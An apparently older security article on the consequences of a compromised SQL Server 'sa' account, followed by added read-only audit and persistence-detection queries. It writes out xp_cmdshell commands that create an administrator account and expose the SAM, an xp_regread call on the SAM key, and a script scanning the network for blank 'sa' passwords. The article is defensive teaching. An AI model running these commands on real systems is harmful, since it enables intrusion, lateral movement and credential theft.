
What could happen if the 'sa' account is compromised?

Say someone has compromised an account with execute rights to the xp_cmdshell extended stored procedure (such as 'sa') using a dictionary attack, social engineering, packet sniffing, trojans, keystroke recorders, or simple guessing. The next step is to compromise the OS. This might include firing up the xp_cmdshell stored procedure and typing:
 
Xp_cmdshell 'net user testuser UgotHacked /ADD'
 
Then:
 
Xp_cmdshell 'net localgroup Administrators testuser /ADD'
 
Note: In SQL Server 7.0, logins outside the sysadmin role run xp_cmdshell under the SQLAgentCmdExec user context by default, so this exploit won't work unless sa is compromised. Some may argue that once a person compromises the Administrator account, talking about what they can do is a waste of time. The point is that sa isn't Administrator; sa is a member of the SQL Server security model, and its exploitation can lead to a compromise of other security models such as NT. This is the primary point you should take from this section: attackers can take advantage of a weaker security model to compromise a stronger one.
 
Now the attacker has an account with local administrator access on your SQL Server machine. (Pray your machine isn't a domain controller, or the user now has domain admin access. Sigh.) While the attackers are there, they just may fire off this query:
 
Xp_cmdshell 'rdisk /s-'
 
This effectively rebuilds the information in the \winnt\repair directory without prompting the user.
 
After backing up the SAM (sam._ in the \winnt\repair directory), the attacker can establish an SMB connection to an administrative share or create one:
 
Xp_cmdshell 'net share getsam=c:\winnt\repair'
 
Of course, if the SMB ports (UDP 137/138, and TCP 139) are blocked, the attacker will just have to find a Web server with anonymous browsing enabled (or enable it using OLE automation stored procedures), move the file, and use a browser to do his or her dirty work. If that doesn’t work, why not just bcp (bulk copy program) the table into an image field and then use the GetChunk ADO method to pull it over to your machine? How about using the built-in TFTP client to download a Netcat listener to the machine and then configure it to listen and transfer? Be creative — hackers are.
 
By the way, compromised SQL Servers make excellent launching points for attacks against other machines inside the network. By hopping from server to server it is possible to move virtually undetected through otherwise well-defended networks. Below is an example SQL script to enumerate other SQL Servers on the network that have null 'sa' accounts.
 
-- Create temp table to store enumerated servers
SET NOCOUNT ON
CREATE TABLE #temp (shelldump varchar(255))
INSERT #temp EXEC xp_cmdshell 'osql -L'
DECLARE @current_server varchar(255), @conn_string varchar(255)
DECLARE sql_cursor CURSOR FOR SELECT * FROM #temp
OPEN sql_cursor
FETCH NEXT FROM sql_cursor INTO @current_server
-- Loop through potential targets and check for null sa accounts
-- If target is vulnerable, version information will be displayed
WHILE @@FETCH_STATUS = 0
BEGIN
    IF @current_server <> 'Servers:'
    BEGIN
        SELECT @current_server = rtrim(ltrim(@current_server))
        SELECT @conn_string = 'exec master..xp_cmdshell ''osql -S' + @current_server + ' -Usa -P -Q "select @@version"'''
        PRINT 'Attempting connection to server: ' + @current_server
        EXECUTE (@conn_string)
        PRINT '====================================================================='
    END
    FETCH NEXT FROM sql_cursor INTO @current_server
END
-- Clean up (temp table name matches its declaration so the drop also works under case-sensitive collations)
CLOSE sql_cursor
DEALLOCATE sql_cursor
DROP TABLE #temp
 
As the above code shows, a compromised SQL Server can be turned into an unwilling participant in further attacks. Even better for the attacker, subsequent probes and intrusions launched from this server will mask the fiend, since logs will show the compromised SQL Server as the source of the suspicious activity.
 

What if you were smart and disabled the xp_cmdshell extended stored procedure? Now where do we go? Try this little gem:
 
xp_regread 'HKEY_LOCAL_MACHINE', 'SECURITY\SAM\Domains\Account', 'F'
 
If the MSSQLServer service is running under the LocalSystem account, this call can return an encrypted password or SID right out of the registry. (David LeBlanc, a frequent poster to ntbugtraq, has correctly pointed out that this will only work on machines without SYSKEY installed.)
 
These are just a few brief samples of exploits that can be performed against an unsecured server. Make sure you audit your own systems to ensure that these and other exploits don’t compromise your security.
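As an added example that is not part of the original article, the following T-SQL audit reports the exposures the preceding sections rely on: whether xp_cmdshell is enabled, which non-sysadmin principals hold grants on xp_cmdshell or xp_regread, who is in sysadmin, which SQL logins have the blank password the enumeration script above probes for, and which account the service runs as. It assumes SQL Server 2005 or later and a sysadmin connection; the last query additionally assumes 2008 R2 SP1 or later.

```sql
-- Added audit example; not from the original article. Assumes SQL Server 2005+
-- and a sysadmin connection to master. Read-only: it changes nothing.
USE master;
SET NOCOUNT ON;

-- 1. Is xp_cmdshell enabled? (0 is the default since SQL Server 2005.)
SELECT name, value_in_use
FROM sys.configurations
WHERE name = N'xp_cmdshell';

-- 2. Explicit grants on the extended procedures the article abuses. Any grantee other
--    than dbo is a non-sysadmin path to the OS (xp_cmdshell) or the registry (xp_regread).
SELECT o.name AS procedure_name, dp.name AS grantee, p.state_desc, p.permission_name
FROM sys.database_permissions AS p
JOIN sys.all_objects AS o ON o.object_id = p.major_id
JOIN sys.database_principals AS dp ON dp.principal_id = p.grantee_principal_id
WHERE p.class = 1                                    -- object-level permission
  AND o.name IN (N'xp_cmdshell', N'xp_regread', N'xp_regwrite');

-- 3. Members of sysadmin: for this article's purposes, each of them is 'sa'.
SELECT m.name AS sysadmin_member, m.type_desc, m.is_disabled
FROM sys.server_role_members AS rm
JOIN sys.server_principals AS r ON r.principal_id = rm.role_principal_id
JOIN sys.server_principals AS m ON m.principal_id = rm.member_principal_id
WHERE r.name = N'sysadmin';

-- 4. SQL logins with a blank password: the 'null sa' the enumeration script probes for.
--    PWDCOMPARE tests a clear-text candidate against the stored hash; 1 means it matches.
SELECT name, is_disabled
FROM sys.sql_logins
WHERE PWDCOMPARE(N'', password_hash) = 1;
GO

-- 5. Service accounts. LocalSystem is what lets xp_regread reach the SAM hive.
--    sys.dm_server_services exists from SQL Server 2008 R2 SP1; it sits in its own
--    batch so the earlier checks still run on instances that lack it.
SELECT servicename, service_account, startup_type_desc
FROM sys.dm_server_services;
```

Anything returned by queries 2 and 4 is a finding; query 3 should list only the administrators you would name from memory.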
 
 
So what? They get into the SQL Server; how does this affect my network?
 
Once the system is compromised, it's likely the intruder will put backdoors in place to gain access to other systems and to make sure he or she can get back to this box in case you read this article and implement changes. Some examples include the following:
 
 
  • Modifying the sp_password stored procedure to capture passwords when users attempt to change their passwords.
  • Installing popular shareware/freeware tools such as NetBus or Back Orifice on the server so the attacker can access the box in other ways even if SQL Server is patched. I include this because Administrator access isn't required for many of these trojans, and SQL Server can make an excellent delivery mechanism.
  • Exploiting holes in other services on the machine through OLE Automation. A popular example is an exploit of IIS that allows the attacker to modify the server to allow anonymous access to a secured Web site.
  • Installing remote control utilities on the server (through IIS, xp_cmdshell, the schedule service, etc.) to gain control of the machine.
  • Registering stored procedures with sp_makestartup so they run whenever the server is started, in the server's security context.
  • Placing entries in the registry using extended stored procs or "regedit /s filename.reg" at the command line. These entries could open null user holes or run scripts at certain times to allow for more access. With registry access at the administrator level, the attacker has total control.

You need to secure SQL Server before it goes into production. If it's too late for this, then do your best to look for these trojans and remove them. Good logging will help you to monitor access and see who is using the server in ways they shouldn't.
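As an added example, not from the original article, the following T-SQL queries hunt for the persistence mechanisms in the list above: startup procedures, objects planted in master that Microsoft did not ship (where a tampered sp_password or a lookalike would have to live), server-level triggers, and an xp_cmdshell proxy credential. It assumes SQL Server 2005 or later, where sp_procoption has replaced sp_makestartup, and a sysadmin connection.

```sql
-- Added detection example; not from the original article. Assumes SQL Server 2005+
-- and a sysadmin connection. Read-only; compare each result set with what you expect.
USE master;
SET NOCOUNT ON;

-- 1. Startup procedures (sp_makestartup in the article, sp_procoption on 2005+).
--    Each one runs under the service account every time the instance starts.
SELECT name, create_date, modify_date
FROM sys.procedures
WHERE OBJECTPROPERTY(object_id, 'ExecIsStartup') = 1;

-- 2. Is the startup scan enabled at all? 0 means item 1 cannot fire; 1 means it will.
SELECT name, value_in_use
FROM sys.configurations
WHERE name = N'scan for startup procs';

-- 3. Objects in master that Microsoft did not ship. System procedures live in the
--    read-only Resource database on 2005+, so a tampered sp_password (or a lookalike
--    named sp_...) would have to be created here and shows up with is_ms_shipped = 0.
SELECT name, type_desc, create_date, modify_date
FROM sys.objects
WHERE is_ms_shipped = 0
  AND type IN ('P', 'X', 'TR', 'FN', 'V')
ORDER BY modify_date DESC;

-- 4. Server-scoped DDL and logon triggers: another way to run code on every connection.
SELECT name, type_desc, create_date, modify_date, is_disabled
FROM sys.server_triggers;

-- 5. xp_cmdshell proxy credential. If it exists, non-sysadmins granted EXECUTE on
--    xp_cmdshell run OS commands as this Windows account.
SELECT name, credential_identity, create_date
FROM sys.credentials
WHERE name = N'##xp_cmdshell_proxy_account##';
```

Record the baseline output on a freshly built server; on a production instance, anything that later appears in queries 1, 3, 4 or 5 without a change ticket is worth a closer look.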